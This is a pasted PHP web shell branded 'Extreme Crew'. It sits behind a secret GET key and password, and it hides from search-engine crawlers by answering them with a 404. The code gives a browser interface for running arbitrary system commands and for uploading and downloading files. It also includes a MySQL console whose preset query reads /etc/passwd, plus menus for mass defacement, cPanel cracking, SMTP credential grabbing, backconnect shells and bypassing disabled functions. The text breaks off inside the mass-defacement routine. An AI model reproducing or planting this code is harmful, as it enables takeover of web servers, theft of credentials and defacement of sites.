· 9 years ago · Nov 16, 2016, 07:52 AM
1<?php
2session_start();
3error_reporting(0);
4set_time_limit(0);
5@set_magic_quotes_runtime(0);
6@clearstatcache();
7@ini_set('error_log',NULL);
8@ini_set('log_errors',0);
9@ini_set('max_execution_time',0);
10@ini_set('output_buffering',0);
11@ini_set('display_errors', 0);
12
13if($_GET['cr0tz'] == '3xcr3w'){
14$auth_pass = "2ed348e96478fc3e4b88bcfb1882f684"; // default: 3xcr3w
15$color = "#00ff00";
16$default_action = 'FilesMan';
17$default_use_ajax = true;
18$default_charset = 'UTF-8';
19if(!empty($_SERVER['HTTP_USER_AGENT'])) {
20 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
21 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
22 header('HTTP/1.0 404 Not Found');
23 exit;
24 }
25}
26
27function login_shell() {
28?>
29<html>
30<head>
31<title>Extreme Crew</title>
32<style type="text/css">
33html {
34 margin: 20px auto;
35 background: #000000;
36 color: green;
37 text-align: center;
38}
39header {
40 color: green;
41 margin: 10px auto;
42}
43input[type=password] {
44 width: 250px;
45 height: 25px;
46 color: red;
47 background: #000000;
48 border: 1px dotted green;
49 padding: 5px;
50 margin-left: 20px;
51 text-align: center;
52}
53</style>
54</head>
55<center>
56<header>
57 <pre>
58 ___________________________
59< root@extreme_crew:~# r00t??? >
60 ---------------------------
61 /$$$$$$ /$$ /$$$$$$ /$$$$$$
62 /$$__ $$ | $$ /$$__ $$ /$$__ $$
63 |__/ \ $$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \__/ /$$$$$$|__/ \ $$ /$$ /$$ /$$
64 /$$$$$/| $$ /$$/|_ $$_/ /$$__ $$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$ /$$__ $$ /$$$$$/| $$ | $$ | $$
65 |___ $$ \ $$$$/ | $$ | $$ \__/| $$$$$$$$| $$ \ $$ \ $$| $$$$$$$$ | $$ | $$ \__/ |___ $$| $$ | $$ | $$
66 /$$ \ $$ >$$ $$ | $$ /$$| $$ | $$_____/| $$ | $$ | $$| $$_____/ | $$ $$| $$ /$$ \ $$| $$ | $$ | $$
67 | $$$$$$/ /$$/\ $$ | $$$$/| $$ | $$$$$$$| $$ | $$ | $$| $$$$$$$ | $$$$$$/| $$ | $$$$$$/| $$$$$/$$$$/
68 \______/ |__/ \__/ \___/ |__/ \_______/|__/ |__/ |__/ \_______/ \______/ |__/ \______/ \_____/\___/
69 </pre>
70</header>
71<form method="post">
72<input type="password" name="pass">
73</form>
74<?php
75exit;
76}
77if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
78 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
79 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
80 else
81 login_shell();
82
83if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
84 @ob_clean();
85 $file = $_GET['file'];
86 header('Content-Description: File Transfer');
87 header('Content-Type: application/octet-stream');
88 header('Content-Disposition: attachment; filename="'.basename($file).'"');
89 header('Expires: 0');
90 header('Cache-Control: must-revalidate');
91 header('Pragma: public');
92 header('Content-Length: ' . filesize($file));
93 readfile($file);
94 exit;
95}
96?>
97<html>
98<head>
99<title>Extreme Crew</title>
100<meta name='author' content='Extreme Crew'>
101<meta charset="UTF-8">
102<style type='text/css'>
103html {
104 background: url(https://scontent-sin6-1.xx.fbcdn.net/v/t1.0-9/15037240_368857546784461_4776330542366398020_n.jpg?oh=1ca38e819a24b7124c724eb4b1448263&oe=58CDDF53) fixed no-repeat;
105 background-size: 100% 100%;
106 color: #ffffff;
107 font-family: 'Ubuntu';
108 font-size: 13px;
109 width: 100%;
110}
111li {
112 display: inline;
113}
114table, th, td {
115 border-collapse:collapse;
116 font-family: Tahoma, Geneva, sans-serif;
117 background: transparent;
118}
119.table_home, .th_home, .td_home {
120 border: 1px solid #00FFFF;
121}
122th {
123 padding: 10px;
124}
125a {
126 color: #00FFFF;
127 text-decoration: none;
128}
129a:hover {
130 color: #00FFFF;
131 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
132 text-decoration:none;
133}
134b {
135 color: #00FFFF;
136}
137input[type=text], input[type=password],input[type=submit] {
138 background: transparent;
139 color: #00FFFF;
140 border: 1px solid #00FFFF;
141 margin: 5px auto;
142 padding-left: 5px;
143 font-family: 'Ubuntu';
144 font-size: 13px;
145}
146textarea {
147 border: 1px solid #00FFFF;
148 width: 100%;
149 height: 400px;
150 padding-left: 5px;
151 margin: 10px auto;
152 resize: none;
153 background: transparent;
154 color: #00FFFF;
155 font-family: 'Ubuntu';
156 font-size: 13px;
157}
158select {
159 width: 152px;
160 background: #000000;
161 color: lime;
162 border: 1px solid #00FFFF;
163 margin: 5px auto;
164 padding-left: 5px;
165 font-family: 'Ubuntu';
166 font-size: 13px;
167}
168option:hover {
169 background: lime;
170 color: #000000;
171}
172*{
173 text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
174 font-size:11px;
175 font-family:Tahoma,Verdana,Arial;
176 color:#00FFFF;
177}
178.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #00FFFF; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #00FFFF;-moz-box-shadow: 0px 4px 2px #00FFFF;}
179.cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00FFFF;font-size:25px;text-shadow: 5px 5px 5px black;}
180.infoweb {
181 border-right: 1px solid #00FFFF;
182}
183a:hover{
184 text-decoration:none;
185}
186div #menu li:hover {cursor:pointer;
187}
188div#menu ul {
189 margin:1px 1px 1px 1px;padding:0;float:left;
190}
191div#menu li {
192 position:relative;display:block;float:left;
193}
194div#menu li:hover>ul {
195 left:0px;
196}
197div#menu a{
198 margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #00FFFF;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:#00FFFF;
199}
200div#menu a:hover{
201 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
202 text-decoration:none;
203}
204div#menu ul ul {
205 margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
206}
207div#menu ul ul a {
208 margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:#00FFFF;
209}
210.output {
211 margin:auto;border:2px solid #00FFFF;width:100%;height:400px;background:none;padding:0 2px;
212 }
213.cmdbox {
214 width:100%;
215}
216</style>
217</head>
218<?php
219
220function w($dir,$perm) {
221 if(!is_writable($dir)) {
222 return "<font color=red>".$perm."</font>";
223 } else {
224 return "<font color=lime>".$perm."</font>";
225 }
226}
227function r($dir,$perm) {
228 if(!is_readable($dir)) {
229 return "<font color=red>".$perm."</font>";
230 } else {
231 return "<font color=lime>".$perm."</font>";
232 }
233}
234function exe($cmd) {
235 if(function_exists('system')) {
236 @ob_start();
237 @system($cmd);
238 $buff = @ob_get_contents();
239 @ob_end_clean();
240 return $buff;
241 } elseif(function_exists('exec')) {
242 @exec($cmd,$results);
243 $buff = "";
244 foreach($results as $result) {
245 $buff .= $result;
246 } return $buff;
247 } elseif(function_exists('passthru')) {
248 @ob_start();
249 @passthru($cmd);
250 $buff = @ob_get_contents();
251 @ob_end_clean();
252 return $buff;
253 } elseif(function_exists('shell_exec')) {
254 $buff = @shell_exec($cmd);
255 return $buff;
256 }
257}
258function perms($file){
259 $perms = fileperms($file);
260 if (($perms & 0xC000) == 0xC000) {
261 // Socket
262 $info = 's';
263 } elseif (($perms & 0xA000) == 0xA000) {
264 // Symbolic Link
265 $info = 'l';
266 } elseif (($perms & 0x8000) == 0x8000) {
267 // Regular
268 $info = '-';
269 } elseif (($perms & 0x6000) == 0x6000) {
270 // Block special
271 $info = 'b';
272 } elseif (($perms & 0x4000) == 0x4000) {
273 // Directory
274 $info = 'd';
275 } elseif (($perms & 0x2000) == 0x2000) {
276 // Character special
277 $info = 'c';
278 } elseif (($perms & 0x1000) == 0x1000) {
279 // FIFO pipe
280 $info = 'p';
281 } else {
282 // Unknown
283 $info = 'u';
284 }
285 // Owner
286 $info .= (($perms & 0x0100) ? 'r' : '-');
287 $info .= (($perms & 0x0080) ? 'w' : '-');
288 $info .= (($perms & 0x0040) ?
289 (($perms & 0x0800) ? 's' : 'x' ) :
290 (($perms & 0x0800) ? 'S' : '-'));
291 // Group
292 $info .= (($perms & 0x0020) ? 'r' : '-');
293 $info .= (($perms & 0x0010) ? 'w' : '-');
294 $info .= (($perms & 0x0008) ?
295 (($perms & 0x0400) ? 's' : 'x' ) :
296 (($perms & 0x0400) ? 'S' : '-'));
297 // World
298 $info .= (($perms & 0x0004) ? 'r' : '-');
299 $info .= (($perms & 0x0002) ? 'w' : '-');
300 $info .= (($perms & 0x0001) ?
301 (($perms & 0x0200) ? 't' : 'x' ) :
302 (($perms & 0x0200) ? 'T' : '-'));
303 return $info;
304}
305function hdd($s) {
306 if($s >= 1073741824)
307 return sprintf('%1.2f',$s / 1073741824 ).' GB';
308 elseif($s >= 1048576)
309 return sprintf('%1.2f',$s / 1048576 ) .' MB';
310 elseif($s >= 1024)
311 return sprintf('%1.2f',$s / 1024 ) .' KB';
312 else
313 return $s .' B';
314}
315function ambilKata($param, $kata1, $kata2){
316 if(strpos($param, $kata1) === FALSE) return FALSE;
317 if(strpos($param, $kata2) === FALSE) return FALSE;
318 $start = strpos($param, $kata1) + strlen($kata1);
319 $end = strpos($param, $kata2, $start);
320 $return = substr($param, $start, $end - $start);
321 return $return;
322}
323function getsource($url) {
324 $curl = curl_init($url);
325 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
326 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
327 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
328 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
329 $content = curl_exec($curl);
330 curl_close($curl);
331 return $content;
332}
333function bing($dork) {
334 $npage = 1;
335 $npages = 30000;
336 $allLinks = array();
337 $lll = array();
338 while($npage <= $npages) {
339 $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
340 if($x) {
341 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
342 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
343 $npage = $npage + 10;
344 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
345 } else break;
346 }
347 $URLs = array();
348 foreach($allLinks as $url){
349 $exp = explode("/", $url);
350 $URLs[] = $exp[2];
351 }
352 $array = array_filter($URLs);
353 $array = array_unique($array);
354 $sss = count(array_unique($array));
355 foreach($array as $domain) {
356 echo $domain."\n";
357 }
358}
359function reverse($url) {
360 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
361 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
362 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
363 curl_setopt($ch, CURLOPT_HEADER, 0);
364 curl_setopt($ch, CURLOPT_POST, 1);
365 $resp = curl_exec($ch);
366 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
367 $array = explode(",,", $resp);
368 unset($array[0]);
369 foreach($array as $lnk) {
370 $lnk = "http://$lnk";
371 $lnk = str_replace(",", "", $lnk);
372 echo $lnk."\n";
373 ob_flush();
374 flush();
375 }
376 curl_close($ch);
377}
378if(get_magic_quotes_gpc()) {
379 function ec_ss($array) {
380 return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
381 }
382 $_POST = ec_ss($_POST);
383 $_COOKIE = ec_ss($_COOKIE);
384}
385
386if(isset($_GET['folder'])) {
387 $dir = $_GET['folder'];
388 chdir($dir);
389} else {
390 $dir = getcwd();
391}
392$kernel = php_uname();
393$ip = gethostbyname($_SERVER['HTTP_HOST']);
394$dir = str_replace("\\","/",$dir);
395$scdir = explode("/", $dir);
396$freespace = hdd(disk_free_space("/"));
397$total = hdd(disk_total_space("/"));
398$used = $total - $freespace;
399$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
400$ds = @ini_get("disable_functions");
401$mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
402$curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
403$wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
404$perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
405$python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
406$show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
407if(!function_exists('posix_getegid')) {
408 $user = @get_current_user();
409 $uid = @getmyuid();
410 $gid = @getmygid();
411 $group = "?";
412} else {
413 $uid = @posix_getpwuid(posix_geteuid());
414 $gid = @posix_getgrgid(posix_getegid());
415 $user = $uid['name'];
416 $uid = $uid['uid'];
417 $group = $gid['name'];
418 $gid = $gid['gid'];
419}
420echo "<table>";
421echo "<td class=infoweb>";
422echo "System: <font color=lime>".$kernel."</font><br>";
423echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
424echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
425echo "Safe Mode: $sm<br>";
426echo "Disable Functions: $show_ds<br>";
427echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
428echo "Current DIR: ";
429foreach($scdir as $c_dir => $cdir) {
430 echo "<a href='?cr0tz=3xcr3w&folder=";
431 for($i = 0; $i <= $c_dir; $i++) {
432 echo $scdir[$i];
433 if($i != $c_dir) {
434 echo "/";
435 }
436 }
437 echo "'>$cdir</a>/";
438}
439echo " [ ".w($dir, perms($dir))." ]";
440echo "</td><td style='width:20%'>";
441echo " Server IP: <font color=lime>".$ip."</font><br> Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
442echo "<br><br>";
443echo " <a href='?' style='border:1px solid #00FFFF;font:12px ;width:200px;padding:0px 20px 0px 20px;'>H O M E</a> <a href='?cr0tz=3xcr3w&do=kill' style='border:1px solid #00FFFF;width:200px;padding:0px 20px 0px 20px;'>K I L L </a> <a href='?cr0tz=3xcr3w&logout=true' style='color:red;border:1px solid #00FFFF;width:200px;padding:0px 20px 0px 20px;'>L O G O U T</a>";
444echo "</td></table>";
445echo "<hr>";
446echo "
447<table>
448<tr>
449<div id='menu'>
450 <ul class=menu>
451 <li><a href='?cr0tz=3xcr3w&folder=$dir'>Filesman</a></li>
452 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=cmd'>Command</a></li>
453 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=jumping'>Jumper</a></li>
454 <li><a>Symlink</a>
455 <ul>
456 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=config' style='background-color:black'> Config</a></li>
457 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=convh' style='background-color:black'> Config vhosts</a></li>
458 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=symser' style='background-color:black'> Symlink Server</a></li>
459 </ul>
460 </li>
461 <li><a>Mass</a>
462 <ul>
463 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=mass_deface' style='background:black'> Mass Deface</a></li>
464 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=mass_helper' style='background:black'> Mass Helper</a></li>
465 </ul>
466 </li>
467 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=domains'>Domains</a></li>
468 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=upload'>Upladoer</a></li>
469 <li><a>Tools</a>
470 <ul>
471 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=zoneh' style='background-color:black'> Zone-H</a></li>
472 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=network' style='background-color:black'> Backconnect</a></li>
473 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=mysql' style='background-color:black'> Mysql Interface</a></li>
474 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=adminer' style='background-color:black'> Adminer</a></li>
475 </ul>
476 </li>
477 <li><a>Grab/Crack</a>
478 <ul>
479 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=cpanel' style='background-color:black'> Cpanel Cracker</a></li>
480 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=smtp' style='background-color:black'> SMTP Grabber</a></li>
481 </ul>
482 </li>
483 <li><a>Bypass</a>
484 <ul>
485 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=etcpler' style='background-color:black'> etc/passw</a></li>
486 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=bypass' style='background-color:black'> Disable Functions</a></li>
487 </ul>
488 </li>
489 <li><a href='?cr0tz=3xcr3w&folder=$dir&do=boom'>Ngindex</a></li>
490 </ul>
491 </div></tr><br><br>";
492 echo "<hr>";
493 echo "<table>";
494if($_GET['logout'] == true) {
495 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
496 echo "<script>window.location='?';</script>";
497} elseif($_GET['do'] == 'upload') {
498 echo "<center>";
499 if($_POST['upload']) {
500 if($_POST['tipe_upload'] == 'biasa') {
501 if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
502 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
503 } else {
504 $act = "<font color=red>failed to upload file</font>";
505 }
506 } else {
507 $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
508 $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
509 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
510 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
511 $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
512 } else {
513 $act = "<font color=red>failed to upload file</font>";
514 }
515 } else {
516 $act = "<font color=red>failed to upload file</font>";
517 }
518 }
519 }
520 echo "Upload File:
521 <form method='post' enctype='multipart/form-data'>
522 <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
523 <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
524 <input type='file' name='ix_file'>
525 <input type='submit' value='upload' name='upload'>
526 </form>";
527 echo $act;
528 echo "</center>";
529} elseif($_GET['do'] == 'kill') {
530 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
531 die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
532 else
533 echo '<center>unlink failed!</center>';
534} elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?cr0tz=3xcr3w&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?cr0tz=3xcr3w&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?cr0tz=3xcr3w&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
535while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
536foreach($tables as $table){$msg .= "<tr><td><a href='?cr0tz=3xcr3w&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
537elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
538$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
539list($total) = mysql_fetch_row($hasil);
540if(isset($_GET['z'])) $page = (int) $_GET['z'];
541else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
542while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
543$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
544for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
545if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
546elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
547$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
548if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
549for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
550if($rows[$j] == "") $dataz = " ";
551else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
552else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
553else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
554while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
555$msg .= "<tr><td><a href='?cr0tz=3xcr3w&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
556@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
557<br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
558<?php }}
559 elseif($_GET['do'] == 'cmd') {?>
560<form action="?cr0tz=3xcr3w&act=<?php echo $dir;?>&do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
561<textarea class="output" readonly>
562<?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
563</textarea> <tr><td colspan="2"><?php echo "$user >";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
564<?php } elseif($_GET['do'] == 'mass_deface') {
565 function sabun_massal($dir,$namafile,$isi_script) {
566 if(is_writable($dir)) {
567 $dira = scandir($dir);
568 foreach($dira as $dirb) {
569 $dirc = "$dir/$dirb";
570 $lokasi = $dirc.'/'.$namafile;
571 if($dirb === '.') {
572 file_put_contents($lokasi, $isi_script);
573 } elseif($dirb === '..') {
574 file_put_contents($lokasi, $isi_script);
575 } else {
576 if(is_dir($dirc)) {
577 if(is_writable($dirc)) {
